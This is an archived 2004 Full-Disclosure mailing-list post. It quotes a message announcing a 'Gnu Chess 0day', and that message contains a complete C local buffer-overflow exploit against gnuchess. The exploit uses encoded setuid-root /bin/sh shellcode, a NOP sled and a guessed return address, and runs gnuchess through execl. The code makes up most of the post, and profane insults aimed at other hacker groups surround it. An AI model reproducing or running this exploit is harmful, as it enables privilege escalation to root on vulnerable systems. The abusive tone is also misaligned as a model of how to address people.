| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
From: venom at gen-x.co.nz (VeNoMouS)
Subject: Gnu Chess 0day
* Note: our pen0rs are 50 x larger than yours. *
* This is a fuck you to gobbles. Go wash your *
* dirty ass hair, go take a bath, get a real life*
* off of your fucking computer. #phrack is a lot*
* of dirt fucks too who don't get off their box *
^^^ FEEL THE LOVE
----- Original Message -----
From: "ace sk8" <ace2oo1sk8@...mail.com>
To: <full-disclosure@...ts.netsys.com>
Cc: <ace2001sk8@...mail.com>
Sent: Monday, February 02, 2004 10:57 AM
Subject: [Full-Disclosure] Gnu Chess 0day
> StTtTTtTtTTtTtTTtTtTTtTtTTtTttTtTtTTtTtTTS
> X X
> X STX ONLINE [ trippin smurfs y0] X
> X X
> StTtTTtTtTTtTtTTtTtTTtTtTTtTttTtTtTTtTtTTS
>
> **************************************************
> * Note: our pen0rs are 50 x larger than yours. *
> * This is a fuck you to gobbles. Go wash your *
> * dirty ass hair, go take a bath, get a real life*
> * off of your fucking computer. #phrack is a lot*
> * of dirt fucks too who don't get off their box *
> **************************************************
>
> */
>
> #include <stdio.h>
>
> char stxcode[] =
>
> /* ace's shellcode [ ace2001sk8@...mail.com ] (setuid=0,/bin/sh) */
> "\x31\xdb\x89\xd8\xb0\x17\xcd\x80\xeb\x03\x5e\xeb\x05\xe8\xf8\xff"
> "\xff\xff\x83\xc6\x0d\x31\xc9\xb1\x50\x80\x36\x01\x46\xe2\xfa\xea"
> "\x09\x2e\x63\x68\x6f\x2e\x72\x69\x01\x80\xed\x66\x2a\x01\x01\x54"
> "\x88\xe4\x82\xed\x11\x57\x52\xe9\x01\x01\x01\x01\x5a\x80\xc2\xb6"
> "\x11\x01\x01\x8c\xb2\x2f\xee\xfe\xfe\xc6\x44\xfd\x01\x01\x01\x01"
> "\x88\x74\xf9\x8c\x4c\xf9\x30\xd3\xb9\x0a\x01\x01\x01\x52\x88\xf2"
> "\xcc\x81\x5a\x5f\xc8\xc2\x91\x91\x91\x91\x91\x91\x91\x91\x91";
>
>
> unsigned long pen0r(void)
>
> {
> __asm__("movl %esp, %eax");
> }
>
> int main(int argc, char **argv) {
>
> int pos; int ace = pen0r(); int stxnop = 0x90;
> int stxbytes = 648; int stxtotal = stxbytes + 4;
> char *stxbof;
> stxbof = (char *)malloc(stxbytes);
>
> for(pos = 0; pos < stxbytes; pos++) {*(long *)&stxbof[pos] = stxnop;}
> *(long *)&stxbof[stxbytes] = pen0r();
> memcpy(stxbof + stxbytes - strlen(stxcode), stxcode, strlen(stxcode));
>
> system("clear");
> printf("########################################\n");
> printf("# [ STX SECURITY LABS ] #\n");
> printf("# gnuchess local poc exploit by: ace #\n");
> printf("########################################\n\n");
> printf("[+] Return Address: 0x%x\n", ace);
> printf("[+] Buffer Size: %d\n", stxtotal);
> printf("[-] /usr/bin/gnuchess -s pwned!\n\n");
>
> execl("/usr/bin/gnuchess", "gnuchess", "-s", stxbof, NULL);
>
> return 0;
>
> }
>
> _________________________________________________________________
> Check out the coupons and bargains on MSN Offers!
> http://shopping.msn.com/softcontent/softcontent.aspx?scmId=1418
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
Powered by blists - more mailing lists